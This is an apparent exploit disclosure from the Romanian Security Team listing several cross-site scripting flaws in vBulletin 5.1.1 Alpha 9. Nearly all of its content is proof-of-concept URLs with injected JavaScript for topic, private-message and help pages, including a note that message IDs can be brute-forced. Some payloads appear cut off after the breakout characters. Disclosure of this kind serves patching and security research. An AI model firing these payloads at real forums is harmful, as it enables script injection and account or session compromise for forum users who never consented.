Exploit Title: vBulletin 5.1 Multiple XSS vulnerabilities
Authors: Romanian Security Team
Website: https://rstforums.com/forum/
Date published: 19 April 2014
Software: vBulletin
Version: 5.1.1 Alpha 9
[XSS] Random topic
- https://website.com/[forum_path]/forum/anunturi-importante/rst-power/67030-rst-admin-restore?view=stream1337";alert(123);//
[XSS] New private message
- https://website.com/[forum_path]/privatemessage/new/9999">
[XSS] View PM: you must know or bruteforce private message ID (830372)
- https://website.com/[forum_path]/privatemessage/view/830372?folderid=random";alert(1);//
[DOM XSS] Help
- https://website.com/[forum_path]/help#'">
(c) Romanian Security Team 2014